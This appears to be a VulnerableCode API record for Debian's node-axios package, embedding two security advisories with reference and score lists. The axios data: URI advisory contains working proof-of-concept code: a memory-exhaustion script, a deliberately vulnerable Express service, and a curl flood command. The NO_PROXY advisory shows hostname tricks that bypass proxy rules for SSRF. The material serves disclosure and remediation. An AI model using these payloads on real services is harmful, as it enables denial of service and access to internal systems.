Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:deb/debian/node-axios@1.15.0-1
Typedeb
Namespacedebian
Namenode-axios
Version1.15.0-1
Qualifiers
Subpath
Is_vulnerablefalse
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
Fixing_vulnerabilities
0
url VCID-aq84-8cnz-byax
vulnerability_id VCID-aq84-8cnz-byax
summary 
Axios is vulnerable to DoS attack through lack of data size check
## Summary

When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.
This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.

## Details

The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.

Relevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

```js
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
```

The decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

```js
export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
```

* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.
* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.


## PoC

```js
const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});
```

Run with limited heap to force a crash:

```bash
node --max-old-space-size=100 poc.js
```

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

```
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
```

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.

```js
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
```
Run this app and send 3 post requests:
```sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```
```

---

## Suggestions

1. **Enforce size limits**
   For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.

2. **Stream decoding**
   Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-58754
reference_id
reference_type
scores
0
value 0.00113
scoring_system epss
scoring_elements 0.29896
published_at 2026-04-02T12:55:00Z
1
value 0.00113
scoring_system epss
scoring_elements 0.29756
published_at 2026-04-07T12:55:00Z
2
value 0.00113
scoring_system epss
scoring_elements 0.29944
published_at 2026-04-04T12:55:00Z
3
value 0.00144
scoring_system epss
scoring_elements 0.34669
published_at 2026-04-18T12:55:00Z
4
value 0.00144
scoring_system epss
scoring_elements 0.34629
published_at 2026-04-21T12:55:00Z
5
value 0.0015
scoring_system epss
scoring_elements 0.35637
published_at 2026-04-12T12:55:00Z
6
value 0.0015
scoring_system epss
scoring_elements 0.3568
published_at 2026-04-11T12:55:00Z
7
value 0.0015
scoring_system epss
scoring_elements 0.35671
published_at 2026-04-09T12:55:00Z
8
value 0.0015
scoring_system epss
scoring_elements 0.35654
published_at 2026-04-16T12:55:00Z
9
value 0.0015
scoring_system epss
scoring_elements 0.35648
published_at 2026-04-08T12:55:00Z
10
value 0.0015
scoring_system epss
scoring_elements 0.35614
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-58754
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593
5
reference_url https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67
6
reference_url https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06
7
reference_url https://github.com/axios/axios/pull/7011
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/pull/7011
8
reference_url https://github.com/axios/axios/pull/7034
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/pull/7034
9
reference_url https://github.com/axios/axios/releases/tag/v0.30.2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/releases/tag/v0.30.2
10
reference_url https://github.com/axios/axios/releases/tag/v1.12.0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/releases/tag/v1.12.0
11
reference_url https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-58754
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-58754
13
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963
reference_id 1114963
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2394735
reference_id 2394735
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2394735
15
reference_url https://github.com/advisories/GHSA-4hjh-wcwx-xvwj
reference_id GHSA-4hjh-wcwx-xvwj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4hjh-wcwx-xvwj
16
reference_url https://access.redhat.com/errata/RHSA-2025:16747
reference_id RHSA-2025:16747
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:16747
17
reference_url https://access.redhat.com/errata/RHSA-2025:18252
reference_id RHSA-2025:18252
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:18252
18
reference_url https://access.redhat.com/errata/RHSA-2025:19221
reference_id RHSA-2025:19221
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19221
19
reference_url https://access.redhat.com/errata/RHSA-2025:19375
reference_id RHSA-2025:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19375
20
reference_url https://access.redhat.com/errata/RHSA-2025:19529
reference_id RHSA-2025:19529
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19529
21
reference_url https://access.redhat.com/errata/RHSA-2025:19804
reference_id RHSA-2025:19804
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19804
22
reference_url https://access.redhat.com/errata/RHSA-2025:22759
reference_id RHSA-2025:22759
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:22759
23
reference_url https://access.redhat.com/errata/RHSA-2025:23069
reference_id RHSA-2025:23069
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:23069
24
reference_url https://access.redhat.com/errata/RHSA-2025:23131
reference_id RHSA-2025:23131
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:23131
25
reference_url https://access.redhat.com/errata/RHSA-2025:23546
reference_id RHSA-2025:23546
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:23546
26
reference_url https://access.redhat.com/errata/RHSA-2026:1018
reference_id RHSA-2026:1018
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1018
27
reference_url https://access.redhat.com/errata/RHSA-2026:1942
reference_id RHSA-2026:1942
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1942
28
reference_url https://access.redhat.com/errata/RHSA-2026:4215
reference_id RHSA-2026:4215
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4215
29
reference_url https://access.redhat.com/errata/RHSA-2026:6226
reference_id RHSA-2026:6226
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6226
fixed_packages
0
url pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1
purl pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1
1
url pkg:deb/debian/node-axios@1.15.0-1
purl pkg:deb/debian/node-axios@1.15.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1
aliases CVE-2025-58754, GHSA-4hjh-wcwx-xvwj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-aq84-8cnz-byax
1
url VCID-axk7-6q4b-vuga
vulnerability_id VCID-axk7-6q4b-vuga
summary 
Axios has a NO_PROXY Hostname Normalization Bypass Leads to SSRF
Axios does not correctly handle hostname normalization when checking `NO_PROXY` rules.
Requests to loopback addresses like `localhost.` (with a trailing dot) or `[::1]` (IPv6 literal) skip `NO_PROXY` matching and go through the configured proxy.

This goes against what developers expect and lets attackers force requests through a proxy, even if `NO_PROXY` is set up to protect loopback or internal services.

According to [RFC 1034 §3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1) and [RFC 3986 §3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2), a hostname can have a trailing dot to show it is a fully qualified domain name (FQDN). At the DNS level, `localhost.` is the same as `localhost`. 
However, Axios does a literal string comparison instead of normalizing hostnames before checking `NO_PROXY`. This causes requests like `http://localhost.:8080/` and `http://[::1]:8080/` to be incorrectly proxied.

This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections.

---

**PoC**

```js
import http from "http";
import axios from "axios";

const proxyPort = 5300;

http.createServer((req, res) => {
  console.log("[PROXY] Got:", req.method, req.url, "Host:", req.headers.host);
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.end("proxied");
}).listen(proxyPort, () => console.log("Proxy", proxyPort));

process.env.HTTP_PROXY = `http://127.0.0.1:${proxyPort}`;
process.env.NO_PROXY = "localhost,127.0.0.1,::1";

async function test(url) {
  try {
    await axios.get(url, { timeout: 2000 });
  } catch {}
}

setTimeout(async () => {
  console.log("\n[*] Testing http://localhost.:8080/");
  await test("http://localhost.:8080/"); // goes through proxy

  console.log("\n[*] Testing http://[::1]:8080/");
  await test("http://[::1]:8080/"); // goes through proxy
}, 500);
```

**Expected:** Requests bypass the proxy (direct to loopback).
**Actual:** Proxy logs requests for `localhost.` and `[::1]`.

---

**Impact**

* Applications that rely on `NO_PROXY=localhost,127.0.0.1,::1` for protecting loopback/internal access are vulnerable.
* Attackers controlling request URLs can:

  * Force Axios to send local traffic through an attacker-controlled proxy.
  * Bypass SSRF mitigations relying on NO\_PROXY rules.
  * Potentially exfiltrate sensitive responses from internal services via the proxy.
  
  
---

**Affected Versions**

* Confirmed on Axios **1.12.2** (latest at time of testing).
* affects all versions that rely on Axios’ current `NO_PROXY` evaluation.

---

**Remediation**
Axios should normalize hostnames before evaluating `NO_PROXY`, including:

* Strip trailing dots from hostnames (per RFC 3986).
* Normalize IPv6 literals by removing brackets for matching.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-62718
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03312
published_at 2026-04-12T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.0329
published_at 2026-04-13T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.0334
published_at 2026-04-11T12:55:00Z
3
value 0.00034
scoring_system epss
scoring_elements 0.09709
published_at 2026-04-16T12:55:00Z
4
value 0.00034
scoring_system epss
scoring_elements 0.09679
published_at 2026-04-18T12:55:00Z
5
value 0.00041
scoring_system epss
scoring_elements 0.12512
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-62718
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718
3
reference_url https://datatracker.ietf.org/doc/html/rfc1034#section-3.1
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://datatracker.ietf.org/doc/html/rfc1034#section-3.1
4
reference_url https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
5
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
6
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
7
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
8
reference_url https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df
9
reference_url https://github.com/axios/axios/pull/10661
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/pull/10661
10
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/pull/10688
11
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
12
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
13
reference_url https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
4
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
5
value CRITICAL
scoring_system generic_textual
scoring_elements
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5
14
